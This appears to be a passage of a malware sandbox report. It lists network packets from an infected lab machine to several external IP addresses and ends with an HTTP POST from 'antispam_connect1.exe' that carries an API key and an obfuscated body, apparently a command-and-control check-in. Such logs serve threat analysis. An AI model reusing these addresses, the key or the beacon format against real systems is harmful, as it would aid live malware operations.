Oct 14, 2024 17:22:41.049777985 CEST | 80 | 49791 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:41.049802065 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:41.049807072 CEST | 80 | 49784 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:41.049829006 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:41.049848080 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:41.050717115 CEST | 80 | 49790 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:41.050837040 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:42.090611935 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:42.091211081 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:42.096123934 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:45.430747986 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:45.435581923 CEST | 80 | 49839 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:45.435693026 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:45.436721087 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:45.441530943 CEST | 80 | 49839 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:46.197560072 CEST | 80 | 49839 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:46.214862108 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:46.219769955 CEST | 80 | 49844 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:46.220168114 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:46.220381021 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:46.225419998 CEST | 80 | 49844 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:46.267865896 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:46.910882950 CEST | 80 | 49844 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:46.927484989 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:46.933350086 CEST | 80 | 49849 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:46.933461905 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:46.933666945 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:46.941435099 CEST | 80 | 49849 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:46.966461897 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:47.658917904 CEST | 80 | 49849 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:47.676707983 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:47.682775974 CEST | 80 | 49855 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:47.682898045 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:47.683094025 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:47.688261032 CEST | 80 | 49855 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:47.699351072 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:48.412225962 CEST | 80 | 49855 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:48.434469938 CEST | 49858 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:48.439407110 CEST | 80 | 49858 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:48.441518068 CEST | 49858 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:48.441749096 CEST | 49858 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:48.446701050 CEST | 80 | 49858 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:48.461527109 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:49.223556995 CEST | 80 | 49858 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:49.223841906 CEST | 49858 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:49.223893881 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:49.223913908 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:49.223953962 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:49.223969936 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:49.229590893 CEST | 80 | 49858 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:49.229681015 CEST | 49858 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:49.229712009 CEST | 80 | 49855 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:49.229768991 CEST | 49855 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:49.230628014 CEST | 80 | 49849 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:49.230680943 CEST | 49849 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:49.230838060 CEST | 80 | 49844 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:49.230849028 CEST | 80 | 49839 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:49.230886936 CEST | 49844 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:49.230921030 CEST | 49839 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:51.459043026 CEST | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:51.459438086 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:51.465888977 CEST | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:51.466068983 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:51.683092117 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:51.732002020 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:23:02.315304995 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:23:02.315613985 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:23:02.322107077 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:23:11.051637888 CEST | 49984 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:23:11.056602955 CEST | 80 | 49984 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:23:11.056700945 CEST | 49984 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:23:11.056999922 CEST | 49984 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:23:11.061791897 CEST | 80 | 49984 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:23:11.747373104 CEST | 80 | 49984 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:23:11.764043093 CEST | 49990 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:23:11.768891096 CEST | 80 | 49990 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:23:11.768963099 CEST | 49990 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:23:11.769184113 CEST | 49990 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:23:11.773931980 CEST | 80 | 49990 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:23:11.800873041 CEST | 49984 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:23:12.469032049 CEST | 80 | 49990 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:23:12.485161066 CEST | 49991 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:23:12.490322113 CEST | 80 | 49991 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:23:12.490412951 CEST | 49991 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:23:12.490675926 CEST | 49991 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:23:12.498085976 CEST | 80 | 49991 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:23:12.522579908 CEST | 49990 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:23:13.182403088 CEST | 80 | 49991 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:23:13.199312925 CEST | 49992 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:23:13.204157114 CEST | 80 | 49992 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:23:13.204232931 CEST | 49992 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:23:13.204442978 CEST | 49992 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:23:13.209237099 CEST | 80 | 49992 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:23:13.236108065 CEST | 49991 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:23:13.908325911 CEST | 80 | 49992 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:23:13.925270081 CEST | 49993 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:23:13.930243969 CEST | 80 | 49993 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:23:13.930339098 CEST | 49993 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:23:13.930579901 CEST | 49993 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:23:13.935553074 CEST | 80 | 49993 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:23:13.962256908 CEST | 49992 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:23:15.151458025 CEST | 80 | 49993 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:23:15.151659012 CEST | 49993 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:23:15.151712894 CEST | 49992 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:23:15.151737928 CEST | 49991 | 80 | 192.168.2.5 | 93.185.159.253
                                            Oct 14, 2024 17:23:15.151763916 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:15.151892900 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:15.153148890 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:15.153220892 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:15.162532091 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:15.162542105 CEST804999291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:15.162564039 CEST804999193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:15.162616968 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:15.162638903 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:15.162684917 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:15.162705898 CEST804999046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:15.162714005 CEST804998446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:15.162748098 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:15.162805080 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:17.324306965 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:17.329317093 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:19.246088982 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.408761024 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:19.408886909 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.409221888 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.414187908 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:20.160610914 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:20.176886082 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:20.181832075 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.181934118 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:20.182188988 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:20.187189102 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.213819027 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:20.866760969 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.883776903 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.888725042 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:20.888921976 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.889127970 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.893944979 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:20.920665026 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:21.467711926 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:21.472645998 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:21.588639975 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:21.604548931 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.609498978 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:21.609580040 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.609951973 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.614748955 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:21.641443014 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:21.689081907 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:21.693959951 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:21.911319971 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:21.959173918 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:22.302325964 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:22.320003986 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.324991941 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:22.325076103 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.325318098 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.330322027 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:22.356976032 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:22.537683010 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:22.537914991 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:22.542865992 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:23.380269051 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.380645037 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.380661964 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:23.380714893 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:23.380759954 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:23.380762100 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:23.381438017 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.381501913 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.386168003 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.386303902 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.387281895 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:23.387298107 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:23.387352943 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:23.387378931 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:23.387428999 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:23.387444019 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:23.387486935 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:23.387507915 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:37.554431915 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:37.559257030 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:42.770524025 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:42.770903111 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:42.775836945 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:45.178322077 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.183397055 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.183487892 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.183733940 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.188640118 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.849822998 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.866900921 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.875129938 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:45.875206947 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.875452995 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.880263090 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:45.891639948 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:46.663028002 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:46.685333967 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.690265894 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:46.690349102 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.690642118 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.695763111 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:46.706731081 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:47.399589062 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:47.416282892 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.421247959 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:47.421339035 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.421597004 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.426419020 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:47.453180075 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:48.151674986 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:48.168302059 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.173144102 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:48.173255920 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.173584938 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.178459883 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:48.205286026 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.273998022 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:49.274220943 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:49.274249077 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.274286985 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:49.274302006 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:49.274318933 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:49.280277967 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:49.280301094 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:49.280316114 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:49.280325890 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:49.280378103 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:49.280421019 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.280430079 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:49.280441046 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:49.281080008 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:49.281126976 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.447282076 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.454516888 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:51.454579115 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.917010069 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:51.922033072 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:52.142688990 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:52.191528082 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:53.397872925 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.402997971 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:53.403074980 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.403402090 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.408555984 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:54.068721056 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:54.085299015 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.090780973 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.090949059 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.091245890 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.095990896 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.123060942 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:54.790015936 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.808712959 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.813704967 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:54.816685915 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.817363024 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.822679043 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:54.832911968 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:55.521861076 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:55.546279907 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.551616907 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:55.551770926 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.552174091 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.557176113 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:55.568422079 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:56.267043114 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:56.283246040 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.288155079 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:56.288242102 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.288460016 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.293313980 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:56.320074081 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.128833055 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:57.129149914 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:57.129149914 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.129196882 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:57.129195929 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:57.129242897 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:57.134697914 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:57.134787083 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:57.135668993 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:57.135680914 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:57.135689974 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:57.135699987 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:57.135740995 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.135776043 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:57.135773897 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:57.135931015 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:24:02.994237900 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:24:02.994513035 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:24:03.000416040 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:24:18.010754108 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:24:18.015782118 CEST1265849705109.172.88.38192.168.2.5
                                            • 46.8.232.106
                                            • 46.8.236.61
                                            • 93.185.159.253
                                            • 91.212.166.91
                                            • 188.130.206.243
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 46.8.232.106 | 80 | 5024 | C:\Users\user\Desktop\antispam_connect1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 17:22:20.402834892 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: lu4b1kVS
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
Oct 14, 2024 17:22:21.447716951 CEST | 554 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 15:22:21 GMT
                                            Content-Length: 436
                                            Content-Type: text/plain; charset=utf-8
